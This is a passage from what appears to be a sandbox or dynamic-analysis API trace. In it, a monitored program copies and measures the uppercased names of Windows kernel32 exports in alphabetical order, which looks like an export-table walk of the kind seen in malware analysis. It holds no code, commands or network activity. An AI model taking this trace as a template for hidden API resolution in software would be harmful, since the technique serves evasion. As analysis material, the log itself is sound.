lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.958] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.958] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.958] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.958] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.958] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.958] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.958] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.958] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.958] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.958] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.958] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.959] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.959] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.959] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.959] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.959] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.959] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.959] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.959] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.959] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.959] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.959] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.959] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.959] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.959] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.959] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.959] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.959] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.959] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.959] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.959] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.960] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.960] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.960] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.960] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.960] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.960] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.960] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.960] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.960] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.960] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.960] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.960] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.960] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.960] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.960] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.960] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.960] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.960] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.960] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.960] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.960] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.960] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.960] lstrlenA (lpString="COPYFILEA") returned 9 [0083.960] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.960] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.960] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.960] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.960] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.960] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.960] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.960] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.960] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.960] lstrlenA (lpString="COPYFILEW") returned 9 [0083.960] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.960] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.960] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.960] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.961] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.961] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.961] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.961] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.961] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.961] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.961] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.961] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.961] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.961] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.961] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.961] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.961] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.961] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.961] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.961] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.961] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.961] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.961] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.962] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.962] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.962] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.962] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.962] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.962] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.962] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.962] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.962] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.962] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.962] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.962] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.962] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.962] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.962] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.962] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.962] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.962] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.962] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.963] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.963] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.963] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.963] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.963] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.963] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.963] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.963] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.963] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.963] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.963] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.963] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.963] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.963] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.963] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.963] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.963] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.963] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.964] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.964] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.964] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.964] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.964] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.964] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.964] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.964] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.964] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.964] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.964] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.964] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.964] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.964] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.964] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.964] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.964] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.964] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.964] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.965] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.965] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.965] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.965] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.965] lstrlenA 